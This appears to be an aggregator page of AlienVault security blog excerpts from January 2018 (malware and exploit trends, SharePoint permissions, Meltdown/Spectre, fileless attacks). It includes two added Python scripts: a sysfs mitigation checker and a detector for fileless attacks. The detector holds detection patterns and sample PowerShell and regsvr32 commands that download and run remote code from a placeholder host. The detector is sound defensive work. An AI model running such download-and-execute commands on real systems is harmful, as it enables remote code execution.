AlienVault.webp 2018-01-24 14:00:00 Mental Models & Security: Thinking Like a Hacker (lien direct) In the world of information security, people are often told to “think like a hacker,” which inevitably reminds me of Sylvester Stallone muttering his line in Demolition Man -- “Send a maniac to catch a maniac”. While such words of wisdom work great for movies, they tend not to be very helpful for those trying to understand it. If you think of a hacker with a very narrow definition (e.g. someone that only breaks web applications), it leads to a counterproductive way of thinking and conducting business. A little knowledge is a dangerous thing, not least because isolated facts don’t stand on their own very well. As legendary investor Charlie Munger once said: “Well, the first rule is that you can't really know anything if you just remember isolated facts and try and bang 'em back. If the facts don't hang together on a latticework of theory, you don't have them in a usable form. You've got to have models in your head. And you've got to array your experience both vicarious and direct on this latticework of models. You may have noticed students who just try to remember and pound back what is remembered. Well, they fail in school and in life. You've got to hang experience on a latticework of models in your head. What are the models? Well, the first rule is that you've got to have multiple models because if you just have one or two that you're using, the nature of human psychology is such that you'll torture reality so that it fits your models, or at least you'll think it does. …” For security pros, it’s worth bearing this in mind. Multiple mental models from different disciplines are needed to make good and informed decisions. When we look at the thought process of a (competent) security professional, it encompasses many mental models. These don’t relate exclusively to hacking or wider technology, but instead cover principles that have broader applications. 
Let’s look at some general mental models and their security applications: 1. Inversion Difficult problems are best solved when they are worked backwards. Researchers are great at inverting systems and technologies to illustrate what the system architect would have rather avoided. In other words, it’s not enough to think about all the things that can be done to secure a system; you also have to think about all the things that would leave a system insecure. From a defensive point of view, it means not just thinking about how to achieve success, but also how failure would be managed. 2. Confirmation Bias What someone wishes, they also believe. We see confirmation bias deeply rooted in applications, systems, and even entire businesses. It means that two people with opposing views on a topic can see the same evidence and come away feeling validated by it. It’s why two auditors can assess the same system and arrive at vastly different conclusions as to its adequacy. However, confirmation bias is extremely dangerous from a defender’s perspective, and clouds judgement. This is something hackers take advantage of all the time. People often fall for phishing emails because they believe they are too clever to fall for one, or too insignificant to be targeted. It’s only when it’s too late that reality sets in. 3. Circle of Competence Most people have a thing they’re really, truly good at. But if you test them in something outside of this area, you’ll find they’re not particularly well-rounded. Worse, they may be ignorant of their own ignorance -- you probably know this as the Dunning-Kruge Guideline
AlienVault.webp 2018-01-23 14:00:00 OTX Trends Part 2: Malware (lien direct) By Javvad Malik and Christopher Doman This is the second of a three part series on trends identified by AlienVault. Part 1 focused on the exploits tracked by OTX. This blog will talk about the malware, and Part 3 will discuss trends we’re seeing in threat actors. Which malware should I be most concerned about? Most security incidents that a security team will respond to involve malware. We took a look at three sources of malware telemetry to help prioritise popular malware families: Malware families AlienVault customers detect the most; Which malware domains are observed the most frequently by Cisco’s Umbrella DNS; and Malware families with the highest number of individual samples Which malware families do our customers detect the most? The following table describes the malware that we detected most frequently on our customers’ networks: This table represents malware detected by AlienVault as it communicates across a network, in 2017. This data is biased towards families that we have named network detections for. That means this table is a good representation of malware that is actively running on networks, though it’s important to also review other statistics on malware that has been blocked from running. The #1 ranked malware, njRat, is particularly popular in the Middle East. It’s a fairly simple .NET backdoor and Youtube is full of videos of how amateur users can deploy it. We often see it packed with a seemingly endless supply of custom packers to evade anti-virus. Whilst the vast bulk of njRat users are low-level criminals, it is also frequently used in targeted political attacks in the Middle East. A Youtube guide for using njRat The #2 ranked malware, NetWire, is primarily used by low-end criminals to steal banking details. Again, it is a freely available tool that has also been abused by targeted attackers. The top malware we saw for Linux was China ELF DDoS.
We saw little malware for Mac, though the adware MacKeeper was popular. Which malware domains are observed the most frequently? We matched known malicious domains from AlienVault OTX against Umbrella DNS’s record of the most visited domains by their customers. From that we produced this table of the “most popular malicious domains”: The column APT33 Wannacry APT 33
AlienVault.webp 2018-01-22 14:00:00 SharePoint Security Best Practices (lien direct) Being conscientious of SharePoint security is simple if you understand the basics. SharePoint is a Microsoft platform which is designed to integrate with Microsoft Office. Microsoft launched the product in 2001. SharePoint is useful for thousands of organizations worldwide because it facilitates sharing documents on private web servers. SharePoint can be purchased as a separate product to deploy on your own intranet web servers, or you can use SharePoint Online as a component of many Office 365 packages. SharePoint Online is hosted on Microsoft’s own servers. But poorly secured web servers and web applications can make organizations vulnerable to cyber-attack. Some of a company’s documents that are distributed through SharePoint may contain sensitive or proprietary information, and you don’t want them to fall into the hands of cyber attackers who could be either internal or external to your network! This quick guide will show you how to use and deploy SharePoint in a secure way so your organization can enjoy the convenience and functionality of SharePoint without introducing vulnerabilities to your corporate network. SharePoint security permission levels There are several types of permissions you can grant users in your SharePoint system. Full Control: These users have all possible SharePoint permissions, and this permission is granted to all members of the Owners group by default. Be careful about which users you place in the Owners security group or otherwise grant Full Control permission. The best practice here is to only grant a limited number of administrators this permission. Edit: This permission enables users to add, edit, and delete lists, and to view, add, update, and delete documents and list items. By default, all users in the Members security group have this permission. 
So don’t place users in the Members group who only need to view, read, or contribute documents. Design: Users with this permission can create lists and document libraries. They can also make sites look pretty by editing pages, applying themes, style sheets, and borders. No security group is assigned this permission automatically. So if you want some users who aren’t administrators in your Owners group with Full Control to be able to make aesthetic changes to your SharePoint site pages, you’ll have to manually assign this permission to another group or to individual users. Contribute: This is a more limited version of the Edit permission. Users with the Contribute permission can add, update, view, and delete documents and list items. Read: This permission should be granted to users who just need to view and download documents, and may also need to see historical versions of documents. Restricted Read: These users can view pages and documents, but they can’t see historical versions of documents or user permissions. In most cases where a user only needs to be able to read the documents on a site, this is the best permission to grant them. View Only: These users can view pages, items and documents. They can only download documents that cannot be viewed in their web browser. Limited Access: This permission only grants users some access to a specific page or file as opposed to an entire site. This level is automatically assigned by SharePoint when you provide access to one specific item. You can’t directly grant this permi
AlienVault.webp 2018-01-19 14:00:00 Things I Hearted this Week – 19th Jan 2018 (lien direct) Happy Friday wonderful people. It’s been a busy week in infosec with a flurry of activity, so let’s jump right in. The 100 Billion Dollar Infosec Question If someone gave you 100 billion dollars to improve information security, how would you spend it? No, seriously, please. Give it some thought. This question spurred Dan Klinedinst to pen his thoughts in a thought-provoking post that will probably leave you with more questions than answers. The 100 Billion Dollar Infosec Question | Dan Klinedinst, Medium IT Security Spending to reach $96 billion in 2018 | Dark Reading Putting the bug in bounty I’m a big fan of bug bounties, I think that they have a lot of benefits. But, as with any emerging service, there will be issues. One of them is differentiating between Bug Bounty and Security Consulting or Testing. And that can cause some problems, which are very well articulated by John Carroll. BugBounty != Security Consulting | CTU Security Inside Uber’s $100,000 Payment to a Hacker, and the Fallout | NY Times Mirai Okiru botnet targets ARC-based IoT devices For those of you who don't know, ARC (Argonaut RISC Core) processors are the second most widely used processors in the world and can be found in all manner of unassuming connected devices, from car tech to storage, home and mobile devices. The new Mirai botnet, known as Mirai Okiru, is going after them with the aim of knocking them offline with distributed denial of service (DDoS) attacks. Mirai Okiru botnet targets for first time ever in the history ARC-based IoT devices | Security Affairs Mirai Okiru is a botnet that's going after ARC-based IoT gadgets | The Inquirer Mirai Okiru: New DDoS botnet targets ARC-based IoT devices | CSO Mental Models & Security: Thinking Like a Hacker Is it weird that I’m including one of my own articles from this week? Is that the equivalent of someone liking their own Facebook posts? 
I’ve been reading up on mental models lately a lot and thought a lot could be applied to security, or as is often said, to think like a hacker. I listed seven of my favourite models in this Dark Reading contributed article. Mental Models & Security: Thinking Like a Hacker | Dark Reading LeakedSource Founder Arrested for Selling 3 Billion Stolen Credentials Guideline Uber
AlienVault.webp 2018-01-18 14:00:00 Shakespeare\'s Netymology (lien direct) One of the coolest things about editing in the tech space, for a word nerd like me, is that the language is brand-new, ad-hoc, and usually made up on the fly by an engineer or security researcher frantically trying to communicate a new idea without saying something like, “and then the thing happens…” The technical term for a word entirely new to the language, describing a previously undescribed event, generated by a subject matter expert in that field, is a protologism. In other fields, like literary criticism, sociology, and politics — places that, frankly, move slower than we do — a word can remain a protologism for years while people debate and consider, before finally accepting it, and it becomes a neologism. Neologisms are words that have been widely adopted, and where the initial source can be pretty readily ascertained. Because technical editors and technical writers are also looking for ways to describe that thing that happens, we tend to be early adopters of protologisms, and move words along the spectrum to neologisms as fast as we upgrade the technology itself. As Shakespeare said in Henry V, “We, my dear, are the makers of fashion.” We also are the greatest generators of new language since Shakespeare (who added something around 2,000 words in a veritable Renaissance for the English language as it existed then). And because our teams tend to be highly diverse, made up of people from all over the world, the words we generate in tech tend to be words that can be plugged in across languages – they’re not unique to any particular language, and tend to resist translation. They end up being naturalized, or transliterated, rather than strictly translated. 
These transliterations end up being generated often through TAP, or Think-Aloud Protocol, which is another beautiful thing technology processes have given the world (most of us call it “muttering to ourselves.”) There’s even a tech-specific word for what this article is about: netymology; the origin and derivation of technical terms. When you’re in the business of creating software that addresses newly-developing online threats, the terminology practically generates itself. A quick stroll through AlienVault’s Open Threat Exchange® (OTX™) will show you all kinds of words that have never been defined. And it’s my job to get those into a glossary for you. It works like this: Attacker (not hacker, for the love of all things fluffy) attacks. Researchers discover. Pulse gets written. I read the pulses, identify the “…and then the thing happens” terms, research to see where along the protologism > neologism spectrum each one falls by seeing if anyone anywhere else is talking about the word, and how they are talking about it, create a definition, and drop that into the glossary that then gets used in the documentation. I’m pretty serious about clear, easy to understand documentation. I think that we, who eat and sleep and breathe new technology, owe it to the users who aren’t in the room where the “…and then the thing happens” moments occur, to make those language evolutions as clear as possible, as u
AlienVault.webp 2018-01-16 14:00:00 OTX Trends Part 1- Exploits (lien direct) By Javvad Malik and Christopher Doman Introduction Every year, AlienVault records billions of anonymised security events from our customers. This telemetry can be aggregated to establish macro trends. And for many years, we have also been comprehensively recording other vendors' threat reports in our Open Threat Exchange (OTX) platform. We have combined these two data-sets to help provide a blueprint for how to prioritise the response to varied threats. You can find the scripts we used to get this data from our free APIs on GitHub. Executive Summary Some of the standout findings from our data covering 2017 are: The most effective exploits quickly proliferate between a number of criminal and nation state groups. Some remain popular for a number of years after their initial discovery. njRat malware variants were the most prevalent malware we saw persisting on networks. Of the ten most popular domains associated with malware, four were sinkholed by MalwareTech. Confirmation of others’ findings of the changing targeted threat landscape. There has been a significant increase in reports on attackers reportedly located in Russia and North Korea. There has also been a significant drop in reports of activity emanating from groups operating from China. OTX Trends: Exploits This is the first of a three part series on the trends we identified in 2017: Part 1 focuses on exploits Part 2 will talk about the malware of concern and trends Part 3 will discuss threat actors and patterns Which exploits should I be most concerned about? Many thousands of vulnerabilities are assigned a CVE number every year, and many more never get reported. If you’re responsible for an organisation’s security, it’s important to know: Which ones are the most important to patch quickly? Which ones are being actively exploited in the wild? What exploits are being reported in vendor reports? 
The following table shows exploits in order of the number of times they have been referenced in vendor reports on OTX: (Figure: a CVE-2017-0199 sample used by criminals.) This table is from a fairly small data-set of approximately 80 vendor reports from 2017 – but it still provides a number of insights: Effective exploits proliferate quickly The #1 ranked exploit CVE-2017-0199 is extremely popular. It has been used by targeted attackers in locations as diverse as North Korea (FreeMilk), China (Winnti) and Iran (Oilrig). It has also been heavily abused by criminal gangs such as some of those deploying Dridex. APT 34
AlienVault.webp 2018-01-12 14:00:00 Things I hearted this week: 12th Jan 2018 (lien direct) Carphone Warehouse Fined £400,000 The Information Commissioner’s Office (ICO) has fined Carphone Warehouse an eye-watering £400,000 for what it referred to as distinct and significant inadequacies in the phone company’s security controls. The full report by the ICO (PDF) is worth reading. It goes into a lot of detail around the vulnerabilities such as the attacker scanning using Nikto, and gaining access to a woefully out-of-date WordPress installation that was running its CMS. It also covers how credentials were stored in plaintext and how the attacker was able to access large amounts of personal data. There are many more details in the report, that I highly encourage you to read, but essentially it boils down to an absence of fundamental security controls, no assurance to verify systems were secured, and a lack of monitoring or detection controls in place. Carphone Warehouse cops £400k fine after hack exposed 3 meeellion folks’ data | The Register Britain fines Carphone Warehouse 400,000 pounds over data breach | Reuters Data protection bill amended to protect security researchers The UK has revealed amendments to its data protection bill to de-criminalise research into whether anonymised data sets are sufficiently anonymous. This is very good news for researchers who may have been worried they could be prosecuted for demonstrating weaknesses in anonymisation. UK gov updates Data Protection bill to protect security researchers | The Inquirer UK Data Protection Bill tweaked to protect security researchers | The Register Data protection bill amended to protect security researchers | The Guardian Data Protection Bill | Parliament UK (pdf) Toy firm VTech fined over data breach VTech, the ‘smart’ toy manufacturer, has been fined $650,000 by the FTC after exposing the data of millions of parents and children. 
Troy Hunt brought up the issue back in November 2015 and it made for a chilling read. Not only was the website not secure, but the data was not encrypted in transit or at rest. Hopefully, this kind of crackdown on weak ‘smart’ devices will continue until we see some changes. Not that I enjoy seeing companies being fined, but it doesn’t seem like many manufacturers are paying much attention to security. FTC fines VTech toy firm over data b
AlienVault.webp 2018-01-11 14:00:00 Cryptocurrency Isn\'t Crypto (lien direct) For the love of all things glittery, you guys, here I am with this lovely platform from which to rant about language development around developing technology and what happens? Bruce freaking Schneier blogs about inappropriate language use around developing technology; specifically, that “Crypto” Is Being Redefined as Cryptocurrencies. I am all aswoon; I’ve been a serious Schneier fan for a really long time. So you can take it to the bank (see what I did there?) when he says, It is a stupid name. Woot! Because it is a stupid name. And this is precisely the sort of ridiculous media-propelled distortion that leads to really bad language use (no, not that kind of bad language. The other kind of bad language). And if Bruce backs me up, life is good. Turns out, Lorenzo Franceschi-Bicchierai (@lorenzoFB) also agrees with me. As a writer, I try to remind myself every day that words matter. For example, when I write about hackers, I try to keep in mind that the word has a controversial history and can have a certain connotation. (Gosh, where have we heard that rant before?) He goes on to say, But this is not just a matter of pedantic semantics. As Green explained, cryptography is starting to matter more and more in meatspace, where regular people live, people who might not know about revived 1990s tech policy controversies. Think of the legal battle between Apple and FBI, or popular and damaging malware like ransomware, which often use cryptographic functions to lock files. “If people know what ‘crypto’ is, they should know it as a real technology—not as some synonym for Bitcoin,” he said. So if you care about this, please politely correct people who incorrectly use the word “crypto.” Or maybe make fun of it, as Ryan Stortz, a security researcher in New York suggested. 
In a chat, he joked that he wants to start trolling people by referring to cryptocurrencies as “Block,” short for “blockchain technologies.” Honestly, though, whatever it takes. Our constant ally, the Merriam-Webster Online Dictionary, once again comes to the rescue. If you search “crypto” they let you know that it’s an abbreviation for the noun cryptography. For a word having to do with secrets, "cryptography" has a surprisingly transparent etymology. The word traces back to the Greek roots kryptos, meaning "hidden," and graphein, meaning "to write." "Kryptos" - which in turn traces to the Greek verb kryptein, meaning "to hide" - is a root shared by several English words, including "crypt," "cryptic," and "encrypt." "Krypton," the name of a colorless gaseous element used especially in some fluorescent lamps and photography flashes, also comes from "kryptos." The name was chosen because the gas is rare and hard to find. There is literally nothing in the word “crypto” th Guideline
AlienVault.webp 2018-01-11 02:53:00 Improve Your Readiness To Defeat Meltdown & Spectre (lien direct) You were just getting back into the swing of things after bringing in the New Year, and it happened. Like a huge firework exploding with a thump that you can feel through your body, the news of Meltdown and Spectre hit the media on January 3, 2018. Since the official disclosure of Meltdown and Spectre, there has been a flurry of news articles, as well as activity by the major processor and operating system vendors, and the community at large, to address these significant flaws. But, just what are these flaws, how are you impacted, and what should you do about them? About Spectre and Meltdown Discovered by researchers that include Google Project Zero, several academic institutions, and some private companies, Spectre and Meltdown exploit design flaws existing in nearly all processors manufactured since 1995; both leak data through the CPU cache, used as a timing side channel. Without getting into ‘too’ much detail: Meltdown (CVE-2017-5754) impacts Intel processors and some ARM-based designs (including Apple’s), and exploits out-of-order execution to let an unprivileged process read kernel memory, and through it potentially any memory on the system. It is a read primitive: it leaks data, it does not by itself execute code. Spectre (CVE-2017-5715 and CVE-2017-5753) affects chips manufactured by Intel, Apple, ARM and AMD, and exploits the branch prediction and speculative execution processor functions to allow access to another user’s data within the same application, or even data from another application. But, “What is speculative execution and branch prediction?” I hear you ask. The quick explanation is that these are functions that were designed to increase the performance of the chip by predicting what the application or system needs next. If it predicts correctly, then the processed information becomes immediately available. 
It’s similar in concept to a fast food restaurant that prepares your food before you arrive, so that you don’t have to wait in line while they cook it. Of course, if you want a deeper explanation of the technology and the exploits, you can read the technical papers published on Meltdown and Spectre. A quick summary of the attacks can be seen in the following table, based on information from Daniel Miessler. Am I At Risk? More than likely you are at risk, given that the flaws affect nearly every processor manufactured from 1995 through to today. However, both exploits require the attacker to run code on the target system; any local user account is enough, and administrator rights are not needed. Needing a local foothold raises the bar somewhat, but Spectre has been demonstrated from JavaScript in unpatched browsers, so a malicious web page is a sufficient delivery vector (patches for many popular browsers have already been issued, so be sure to update them!). Are There Any Known Attacks That Use Meltdown or Spectre? So far, Meltdown and Spectre are not known to have been used to steal data. That said, compromise can be difficult to detect. The AlienVault Labs Guideline
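The "Am I at risk?" question has a concrete answer on Linux: kernel 4.15 (January 2018) and its backports expose one file per issue under /sys/devices/system/cpu/vulnerabilities/, each reading "Not affected", "Vulnerable" or "Mitigation: <name>". The script below is an added example, not part of the original post or of any AlienVault tool; it reads those files where they exist and otherwise falls back to a constructed sample, and deliberately reports a missing file as unknown rather than safe, since an older kernel simply has nothing to say.

```python
"""Report the kernel's view of Meltdown/Spectre mitigation status on Linux.

Added example (not from the original post). Linux 4.15+ exposes one file per
vulnerability under /sys/devices/system/cpu/vulnerabilities/; each contains
"Not affected", "Vulnerable" (optionally with details) or "Mitigation: <name>".
The SAMPLE_SYSFS contents below are constructed for the offline demo.
"""
import os

SYSFS_DIR = "/sys/devices/system/cpu/vulnerabilities"
# The three issues the post covers, keyed by the filename the kernel uses.
CHECKS = {
    "meltdown": "CVE-2017-5754",
    "spectre_v1": "CVE-2017-5753",
    "spectre_v2": "CVE-2017-5715",
}


def classify(status_line):
    """Map one sysfs status line to 'not_affected', 'mitigated', 'vulnerable' or 'unknown'."""
    text = status_line.strip()
    if text.startswith("Not affected"):
        return "not_affected"
    if text.startswith("Mitigation:"):
        return "mitigated"
    if text.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def assess(status_by_file):
    """Return {filename: (cve, classification, raw)} for each known check.

    A missing entry (older kernel, or a non-Linux host) is reported as 'unknown'
    rather than silently treated as safe.
    """
    report = {}
    for name, cve in CHECKS.items():
        raw = status_by_file.get(name)
        report[name] = (cve, classify(raw) if raw is not None else "unknown", raw)
    return report


def read_sysfs(directory=SYSFS_DIR):
    """Read the real sysfs files if present; returns {} where they do not exist."""
    statuses = {}
    if not os.path.isdir(directory):
        return statuses
    for name in CHECKS:
        try:
            with open(os.path.join(directory, name)) as fh:
                statuses[name] = fh.read()
        except OSError:
            continue
    return statuses


# Constructed sample: a host patched for Meltdown (KPTI) but not yet for Spectre v2.
SAMPLE_SYSFS = {
    "meltdown": "Mitigation: PTI\n",
    "spectre_v1": "Mitigation: __user pointer sanitization\n",
    "spectre_v2": "Vulnerable: Minimal generic ASM retpoline\n",
}

if __name__ == "__main__":
    live = read_sysfs()
    source = live if live else SAMPLE_SYSFS
    print("source:", "live sysfs" if live else "constructed sample")
    for name, (cve, verdict, raw) in assess(source).items():
        print(f"{name:12s} {cve}  {verdict:13s} {(raw or '').strip()}")
```

Note that "Mitigation:" only tells you the kernel side is handled; Spectre v2 mitigation on Intel also depends on a microcode update, and the browser-based Spectre vector is addressed by browser patches, not by anything this script reads.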
AlienVault.webp 2018-01-09 14:00:00 Top 17 Blogs from \'17 (lien direct) It was a great year in blogs for AlienVault! Here are the top blogs from 2017, selected by number of views from all sources. Drumroll please. Explain Bitcoin to Me by Tristan Johns. It’s an approachable but technical explanation of how Bitcoin works. MacSpy: OS X RAT as a Service by Peter Ewane. It’s about one of the first malware-as-a-service (MaaS) for OS X. Configuring Kali Linux on Amazon AWS Cloud for FREE by Irfan Shakeel. If you want to experiment with pentesting without spending money, this blog will let you know how. How Does Whonix Make Kali Linux Anonymous & How to Prevent It? by Irfan Shakeel. Learn what Whonix is and how it works, and how it can be used to go incognito while using Kali Linux. There’s also info on how to prevent folks from doing it in your corporate network. Ongoing WannaCry Ransomware Spreading Through SMB Vulnerability by AlienVault Labs. The blog details findings on WannaCry as it started in May 2017. LockCrypt Ransomware Spreading via RDP Brute-Force Attacks by Chris Doman. Best Advice for a Career in Cyber Security by Ryan Leatherbury. Ryan discusses networking, conferences, blogs, InfoSec on Twitter, hands-on tools, mentors and more! It’s Only a Hacker if It’s Linus Himself by Laureen Hudson. At AlienVault, we stick to precisely descriptive terms; we have malicious actors, we have security researchers, but unless we have the fortune to be talking about Linus himself, you’ll never see hackers in our documentation. How the Vote Hacking Was Done at DefCon25 by @notpandapants. From a guest blogger who participated. The Diebold ExpressPoll 5000 is a piece of election hardware that is compromised to the core, and creates a hacker-friendly platform for large-scale election manipulation, on multiple fronts. Interesting blog, but a little scary too. Red Teamers Can Learn Secrets by Purple Teaming by Haydn Johnson. 
Great guest blog by a practitioner, teaching us why Red Teamers Should “Purple Team it”. MacronLeaks – A Timeline of Events by Chris Doman. Chris discusses the implications of leaked documents and the 2017 French election. How to Prepare to Take the OSCP by Blade Soriano. Guest blogge Wannacry
AlienVault.webp 2018-01-05 14:00:00 Things I Hearted this Week 5th Jan 2018 (lien direct) The opening of movies sets the tone for the rest of the film. Within the first few minutes you usually get an idea of the characters, whether it's a slow suspense, a drama, or action flick. If the first few days of 2018 are any indication, the IT Security world has kicked off with a dizzying Michael Bay-esque opening action sequence with rapid cuts that would rival any Edgar Wright montage. So let's jump head first right into it. Meltdown Step aside Heartbleed, and forget all about WannaCry, there's a new duo of attacks in town, complete with logos, websites, and tales of doom. Meltdown Attack, the website. Google Project Zero blog NCSC’s advice Replace CPU hardware – legit advice. Linus Torvalds was not happy, and issued a strongly-worded statement Mozilla Confirms Web-Based Execution Vector for Meltdown and Spectre Attacks | Bleeping Computer Facebook and India’s controversial National ID Database Facebook has clarified that it’s not asking new users in India for their Aadhaar information while signing up for a new Facebook account. Aadhaar is India’s biometric ID system that links the demographic information of more than a billion Indians with their fingerprints and iris scans, and stores it in a centralized government-owned database that both government agencies and private companies can access to authenticate people’s identities. The program has been slammed by critics for enabling surveillance and violating privacy. Facebook said this was a “small test” that the company ran with a limited number of Indian users, and that its goal was to help new users understand how to sign up to Facebook with their real names. It sounds an awful lot like the “wallet inspector” in the school playground that would also then keep my money safe for me. 
Facebook Just Clarified That It Is Not Collecting Data From India's Controversial National ID Database |Buzzfeed Rs 500, 10 minutes, and you have access to billion Aadhaar details | The Tribune India Trackmageddon Two researchers have disclosed problems with hundreds of vulnerable GPS services using open APIs and trivial passwords (123456), resulting in a multitude of privacy issues including direct tracking. Further, many of the vulnerable services have open directories exposing logged data. For some, the vulnerabilities discovered and disclosed by Vangelis Stykas (@evstykas) and Michael Gruhn (@0x6d696368) aren't new. They were disclosed during Kiwicon in 2015 by Lachlan Temple, who demonstrated flaws in a popular car tracking immobilization device. Wannacry Uber
AlienVault.webp 2018-01-04 14:00:00 What's More Important, the Red Team or the Blue Team (lien direct) I ran a poll before the holidays, to understand the InfoSec community's thoughts and attitudes on Red Teaming versus Blue Teaming a bit better. As you likely know, Red Teamers are those who non-maliciously "attack" a company, and Blue Teamers are the defenders. We've had some interesting blogs on this topic, and for a very positive perspective on Red Teaming, check this guest blog out. [Twitter poll embed] However, it was a trick question! Both are necessary, as pointed out in this reply. A false question. Fire fighters vs. fire safety inspectors. Both are essential. If the inspector were completely successful then the fire fighter would get bored. Fortunately, complete success is impossible for either. Keeps us all employed. — C J Czelling (@CJCzelling) December 10, 2017 I gave the third option for those unwilling to choose sides. However, given the choice of only one, the majority of people chose Blue Team. It does make sense: if you only have one or the other, you had better have defenders rather than yet more challengers on top of the bad guys already attacking your company on a regular basis. If you're a small company, you might have only one person, or one person part-time, in the role of InfoSec, so when constrained, Blue Team is where you'll invest. Marcus Carey, a noted Blue Teamer, summed it up nicely. Blue team all the way. Add a dash of red to make it purple. — Marcus (@marcusjcarey) December 10, 2017 The fact that both are necessary was a consistent theme in the replies. There were several very specific comments around Purple teaming. It made me go back and re-read Haydn Johnson's blog on Purple Teaming from early 2017. Haydn makes the excellent point that Red Teamers benefit greatly by using some Blue Team tricks. 
Blue Teamers tend to know what really works, and the Red Team benefits from learning the Blue Team's Defense - Security Controls / Applications / Response. Here's a sampling of the Purple Team themed responses: Teamwork — Nathan (@NathOnSecurity) December 10, 2017 Purple obviously — Travis (@pinedtree) December 10, 2017 While I voted Blue Team, I have to say that I honestly feel as though a mixture of Blue and Red (Purple) is the best for
AlienVault.webp 2018-01-03 14:00:00 Fileless Attacks are Driving Up Security Complexity & Costs (lien direct) If you feel like it’s getting harder and more expensive to protect your company from cyber attacks, you’re not alone. From streamlined startups to global enterprises, organizations in every industry are feeling the crunch as the threats they’re facing rapidly evolve. The Ponemon Institute’s 2017 State of Endpoint Security Risk report provides a thorough and enlightening overview of what’s happening. Now in its fifth consecutive year, this highly regarded report analyzes survey responses from more than 600 IT and security practitioners located in the United States. This year’s edition highlighted a few startling stats as well as some unsettling trends. What won’t surprise most IT professionals is that the threat of endpoint security risk has increased, due to both the rising number of attacks and the evolution of attack techniques. Also on the rise is the cost of attacks. Based on data collected for the report, the average total hard cost of a successful attack is more than $5 million, including IT and end-user productivity loss, system downtime, theft of information assets, and a variety of other damages. What may be overlooked, however, is that the complexity and day-to-day cost of defending against these attacks is becoming increasingly prohibitive. Evolving Attack Techniques Drive Higher Day-to-Day Prevention Costs Attackers are changing their approach based on what’s working. Looking at data for the past 12 months, the Ponemon report found that 54 percent of respondent organizations experienced one or more endpoint attacks that successfully compromised data assets and/or IT infrastructure. Of those successful attacks, 77 percent involved fileless techniques designed to evade detection by abusing legitimate system tools or launching malicious code from memory. 
Fileless techniques have long been used by sophisticated hacking groups, who typically aim their attacks at high-level targets like governments and large corporations. It was only a matter of time before these techniques were more widely adopted by cyber criminals. Now, because fileless attack techniques are expressly designed to exploit gaps in traditional security solutions, organizations large and small are finding themselves vulnerable.   The urgent need to adapt existing protection to address fileless techniques is one of the primary factors driving up prevention costs. To begin with, the rapid proliferation of these types of attacks has caused organizations to lose faith in traditional antivirus (AV) security measures. As a result, companies are either replacing or supplementing their existing AV with new endpoint protection solutions. Unfortunately, because the majority of these options were designed to be used by large enterprise security teams they are typically too expensive and complex for mid-market organizations. Not only do these products incur up-front implementation costs in the form of professional installation services and other expenses, they also typically increase ongoing management costs because of things like: Greater expertise requirements: As traditional security solutions struggle to adapt to the new threats, both they and new entrants into the market are rolling out new features and functionality that make management more complex. This in turn can create additional service costs and also higher staffing fees as companies find they need to hire more senior IT security professionals to manage the advanced solutions. Additional time and resources spent on monitoring: The majority of solutions t
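The reason fileless techniques slip past file-scanning antivirus is that the only artefacts are a legitimate signed binary and its command line, so detection has to move to process-creation telemetry. The script below is an added example, not from the original post or the Ponemon report: it takes records shaped like Sysmon Event ID 1 / Windows 4688 fields (the "Image" and "CommandLine" field names are an assumption), decodes PowerShell -EncodedCommand payloads, and flags the tool-abuse patterns the passage describes. The sample events are constructed, not real telemetry.

```python
"""Flag fileless / living-off-the-land process launches in process-creation logs.

Added example (not part of the original post or the Ponemon report). The input
is a list of constructed records in the shape of Sysmon Event ID 1 / Windows
4688 fields (image path + command line); the field names are assumptions.
"""
import base64
import re

# Built-in Windows tools commonly abused to run code without dropping a file.
LOLBINS = {"powershell.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
           "wscript.exe", "cscript.exe", "certutil.exe", "wmic.exe"}

# Command-line fragments that indicate in-memory download/execution or tool abuse.
SUSPICIOUS = [
    (re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), "in-memory execution (IEX)"),
    (re.compile(r"DownloadString|DownloadFile|Net\.WebClient", re.I), "download cradle"),
    (re.compile(r"FromBase64String", re.I), "base64 payload decoding"),
    (re.compile(r"scrobj\.dll|/i:https?://", re.I), "regsvr32 scriptlet (squiblydoo)"),
    (re.compile(r"\bmshta\b.*(javascript|vbscript|https?:)", re.I), "mshta remote script"),
    (re.compile(r"\bwmic\b.*\bformat:", re.I), "wmic stylesheet execution"),
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), "hidden window"),
]
# PowerShell accepts any unambiguous prefix of -EncodedCommand; payload is base64 of UTF-16LE.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event):
    """Return the list of reasons this process launch looks fileless; [] if clean."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    reasons = []
    if image not in LOLBINS:
        return reasons
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    # Scan both the raw command line and the decoded payload for indicators.
    for text in (cmd, decoded or ""):
        for pattern, label in SUSPICIOUS:
            if pattern.search(text) and label not in reasons:
                reasons.append(label)
    return reasons


def scan(events):
    """Return [(index, reasons)] for every event with at least one indicator."""
    results = []
    for i, event in enumerate(events):
        reasons = analyse(event)
        if reasons:
            results.append((i, reasons))
    return results


def _b64_utf16(script):
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe report.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc "
                    + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')")},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://example.test/x.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['CommandLine'][:60]}... -> {', '.join(reasons)}")
```

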